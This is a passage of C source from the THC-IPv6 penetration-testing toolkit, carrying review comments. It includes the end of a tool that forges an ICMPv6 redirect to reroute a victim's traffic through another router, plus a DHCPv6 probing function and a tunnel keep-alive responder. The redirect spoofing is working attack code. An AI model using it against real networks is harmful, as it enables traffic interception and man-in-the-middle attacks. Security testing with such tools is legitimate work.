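                fprintf(stderr, "Error: %s is not a valid mac address\n", argv[6]);
                exit(-1);
            }
            for (k = 0; k < 6; k++) {
                if (mac_in[k] > 0xff) {
                    fprintf(stderr, "Error: %s is not a valid mac address\n", argv[6]);
                    exit(-1);
                }
                mac[k] = (unsigned char) mac_in[k];
            }
        } else
            mac6 = thc_get_own_mac(interface);
    }

    /* strtol instead of atoi: out-of-range input is defined and simply ignored */
    if (argc >= 8) {
        ttl_arg = strtol(argv[7], NULL, 10);
        if (ttl_arg > 0 && ttl_arg <= 255)
            ttl = (int) ttl_arg;
    }

    memset(buf, 'A', 16);

    /* echo request with target as source and src as destination */
    if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, target6, src6, 0, 0, 0, 0, 0)) == NULL)
        return -1;
    if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, (unsigned char *) &buf, 16, 0) < 0)
        return -1;
    if (thc_generate_and_send_pkt(interface, fakemac, NULL, pkt, &pkt_len) < 0) {
        fprintf(stderr, "Error: Can not send packet, exiting ...\n");
        exit(-1);
    }

    usleep(25000);
    /* turn the sent packet around in place and set its hop-limit byte; the
     * result is the packet quoted inside the redirect */
    ipv6 = (thc_ipv6_hdr *) pkt;
    thc_inverse_packet(ipv6->pkt + offset, ipv6->pkt_len - offset);
    ipv6->pkt[offset + 7] = (unsigned char) ttl;

    thc_redir6(interface, oldrouter6, fakemac, NULL, newrouter6, mac6, ipv6->pkt + 14, ipv6->pkt_len - 14);
    printf("Sent ICMPv6 redirect for %s\n", argv[3]);

    free(self6);
    free(fakemac);

    return 0;
}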
Пример #14
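/*
 * Entry point: sends one DHCPv6 Solicit and one DHCPv6 Information-Request
 * to ff02::1:2 (UDP 546 -> 547) and then hands every captured packet
 * addressed to UDP port 546 to check_packets() until the 3-second alarm
 * fires clean_exit().
 *
 * Arguments: [-d] [-n] [-N] [-1] [-r] interface [name]
 *
 * Uses names declared outside this function: interface, dns_name, the
 * message templates solicit and inforeq, _TAKE3, clean_exit and
 * check_packets.
 * NOTE(review): sizeof(solicit) and sizeof(inforeq) are copied into
 * 1024-byte buffers without a bound check - confirm both templates fit.
 * NOTE(review): use_real_mac and use_real_link start at 1 and are only ever
 * set to 1, so -n/-N change nothing and the "!use_real_*" branches are dead;
 * "-d" is accepted by getopt but has no case and ends in the error branch.
 * NOTE(review): rand() is used without a visible srand(), so the random
 * bytes repeat from run to run.
 *
 * Returns -1 if a packet cannot be built; otherwise it never returns.
 */
int main(int argc, char *argv[]) {
  unsigned char mac[6] = { 0, 0x0c, 0, 0, 0, 0 }, *pkt = NULL, *pkt2 = NULL;
  char wdatabuf[1024], wdatabuf2[1024];
  unsigned char *mac6 = mac, *src, *dst;
  int i, s, len, len2, pkt_len = 0, pkt2_len = 0;
  unsigned long long int count = 0;
  pcap_t *p = NULL;
  int do_all = 1, use_real_mac = 1, use_real_link = 1;

  if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) {
    help(argv[0]);
    exit(-1);                   /* only reached if help() returns */
  }

  if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]);

  while ((i = getopt(argc, argv, "dnNr1")) >= 0) {
    switch (i) {
    case 'N':
      use_real_link = 1;
      /* fallthrough */
    case 'n':
      use_real_mac = 1;
      break;
    case '1':
      do_all = 0;
      break;
    case 'r':
      i = 0;
      break;                    // just to ignore -r
    default:
      fprintf(stderr, "Error: unknown option -%c\n", i);
      exit(-1);
    }
  }

  /* options only, no interface: argv[optind] would be NULL and
   * argv[optind + 1] would be read past the end of argv */
  if (optind >= argc) {
    help(argv[0]);
    exit(-1);
  }

  memset(mac, 0, sizeof(mac));
  interface = argv[optind];
  if (thc_get_own_ipv6(interface, NULL, PREFER_LINK) == NULL) {
    fprintf(stderr, "Error: invalid interface %s\n", interface);
    exit(-1);
  }
  dns_name = argv[optind + 1];  /* NULL when no name was given */
  if (use_real_link)
    src = thc_get_own_ipv6(interface, NULL, PREFER_LINK);
  else
    src = thc_resolve6("fe80::");
  if (use_real_mac)
    mac6 = thc_get_own_mac(interface);
  dst = thc_resolve6("ff02::1:2");
  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stderr, NULL, _IONBF, 0);

  // only to prevent our system to send icmp port unreachable messages
  if ((s = thc_bind_udp_port(546)) < 0)
    fprintf(stderr, "Warning: could not bind to 546/udp\n");
  if ((p = thc_pcap_init_promisc(interface, "ip6 and udp and dst port 546")) == NULL) {
    fprintf(stderr, "Error: can not open interface %s in promisc mode\n", interface);
    exit(-1);
  }
  len = sizeof(solicit);
  memcpy(wdatabuf, solicit, len);
  len2 = sizeof(inforeq);
  memcpy(wdatabuf2, inforeq, len2);

  printf("Sending DHCPv6 Solicitate message ...\n");
  printf("Sending DHCPv6 Information Request message ...\n");
  if (!use_real_link)
    memcpy(src + 8, (char *) &count, 8);

  // start0: 1-3 rand, 18-21 rand, 22-27 mac, 32-35 rand
  for (i = 0; i < 3; i++) {
    wdatabuf[i + 32] = rand() % 256;
    wdatabuf[i + 18] = rand() % 256;
    mac[i + 2] = rand() % 256;
  }
  if (!use_real_mac)
    memcpy(wdatabuf + 22, mac, 6);
  if (!use_real_mac)
    memcpy(wdatabuf2 + 18, mac, 6);
  /* bytes 1..3 of both messages are taken from `count` */
  memcpy(wdatabuf + 1, (char *) &count + _TAKE3, 3);
  memcpy(wdatabuf2 + 1, (char *) &count + _TAKE3, 3);

  if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src, dst, 1, 0, 0, 0, 0)) == NULL)
    return -1;
  if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, wdatabuf, len) < 0)
    return -1;
  if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0)
    printf("!");
  if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt2_len, src, dst, 1, 0, 0, 0, 0)) == NULL)
    return -1;
  if (thc_add_udp(pkt2, &pkt2_len, 546, 547, 0, wdatabuf2, len2) < 0)
    return -1;
  if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt2, &pkt2_len) < 0)
    printf("!");
  /* stop listening after three seconds */
  signal(SIGALRM, clean_exit);
  alarm(3);
  pkt = thc_destroy_packet(pkt);
  while (1) {
    usleep(75);
    while (thc_pcap_check(p, (char *) check_packets, NULL) > 0);
  }

  return 0;                     // never reached
}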
Пример #15
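/*
 * pcap callback: recognises tunnel keep-alive messages in a captured frame
 * and, unless `passive` is set, answers them.
 *
 *   type == 2 (6in4): an ICMPv6 echo request inside the tunnelled IPv6
 *                     packet is answered with an echo reply carrying the
 *                     same identifier/sequence word and payload.
 *   otherwise (PPPoE): a frame with protocol 0xc021 and code 9 is answered
 *                     by swapping the Ethernet addresses and setting the
 *                     code to 10 (presumably LCP echo request/reply -
 *                     confirm).
 *
 * foo     unused user pointer from pcap
 * header  capture header; only caplen is read
 * data    captured bytes; this is untrusted network input
 *
 * Reads these names from outside the function: debug, type, passive,
 * interface, do_hdr, do_hdr_size, do_hdr_off, thc_socket.
 * NOTE(review): do_hdr is assumed to hold at least 18 + do_hdr_off bytes -
 * confirm against its declaration.
 * NOTE(review): on the early returns after thc_create_ipv6_extended() the
 * packet is not released; whether thc_destroy_packet() may be called on a
 * partially built packet is not visible here.
 *
 * Exits the process with -1 if the PPPoE reply cannot be sent.
 */
void intercept(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) {
  unsigned char *ipv6hdr, *pkt, buf[1500];
  int len = header->caplen, pkt_len = 0;
  unsigned int seq, offset = 0;
  unsigned short int orig, seen;
  long base;
  thc_ipv6_hdr hdr;
  
  if (debug) {
    printf("DEBUG: packet received\n");
    thc_dump_data((unsigned char *)data, len, "Received packet on tunnel");
  }

  if (type == 2) { // 6in4
    len -= do_hdr_size;
    /* check the length before the first byte of the inner packet is read:
     * 40 bytes IPv6 header plus 8 bytes ICMPv6 header */
    if (len < 48)
      return;
    ipv6hdr = (unsigned char*) (data + do_hdr_size);
    if ((ipv6hdr[0] & 240) != 0x60)
      return;
    if (ipv6hdr[6] != NXT_ICMP6 || ipv6hdr[41] != 0)
      return;
    /* copy instead of casting: the word is not guaranteed to be aligned */
    memcpy(&seq, ipv6hdr + 44, sizeof(seq));
    if (ipv6hdr[40] == ICMP6_PINGREQUEST) {
      printf("Keep-alive ping request ID 0x%x seen\n", htonl(seq));
      if (passive == 0) {
        /* reply goes from the request's destination back to its source */
        if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, ipv6hdr + 24, ipv6hdr + 8, 255, 0, 0, 0, 0)) == NULL)
          return;
        if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREPLY, 0, htonl(seq), (unsigned char *) ipv6hdr + 40 + 8, len - 40 - 8, 0) < 0)
          return;
        if (thc_generate_and_send_pkt(interface, NULL, NULL, pkt, &pkt_len) < 0)
          return;
        pkt = thc_destroy_packet(pkt);
        printf("Keep-alive ping reply ID 0x%x sent\n", htonl(seq));
      }
    }
    if (passive && ipv6hdr[40] == ICMP6_PINGREPLY)
      printf("Keep-alive ping reply ID 0x%x seen\n", htonl(seq));
  } else { // PPPoE
    /* len <= 1500 also guarantees that the copies into buf[1500] fit */
    if (len < 40 || len > 1500)
      return;
    /* every access below lies between data[16 + base] and data[22 + base];
     * do_hdr_off comes from configuration, so bound it against the frame */
    base = (long) offset + do_hdr_off;
    if (16 + base < 0 || 22 + base >= len)
      return;
    memcpy(&seen, data + 20 + base, sizeof(seen));
    if (htons(seen) != 0xc021)
      return;
    /* from here on `seen` holds the session id of the captured frame */
    memcpy(&seen, data + 16 + base, sizeof(seen));
    if (memcmp(data + 16 + base, do_hdr + 16 + base, 2) != 0) {
      memcpy(&orig, do_hdr + 16 + base, sizeof(orig));
      fprintf(stderr, "Warning: PPPoE SessionID is different to that defined in the environment variable! ((specified) %04x != %04x (seen))\n", htons(orig), htons(seen));
    }
    if (data[22 + base] == 9) {
      printf("Keep-alive request ID 0x%04x seen\n", htons(seen));
      if (passive == 0) {
        /* same frame with source and destination MAC swapped, code 10 */
        memcpy(buf + 12, data + 12, len - 12);
        memcpy(buf + 6, data, 6);
        memcpy(buf, data + 6, 6);
        buf[22 + base] = 10;
        /* only pkt and pkt_len are filled in; zero the rest so that no
         * uninitialised field is handed to the library */
        memset(&hdr, 0, sizeof(hdr));
        hdr.pkt = buf;
        hdr.pkt_len = len;
        if (thc_send_pkt(interface, (unsigned char*) &hdr, &len) < 0) {
          fprintf(stderr, "Error: could not send packet to interface %s (%d)\n", interface, thc_socket);
          exit(-1);
        }
        printf("Keep-alive reply ID 0x%04x sent\n", htons(seen));
      }
    } else {
      if (passive && data[22 + base] == 10)
        printf("Keep-alive reply ID 0x%04x seen\n", htons(seen));
    }
  }

  return;
}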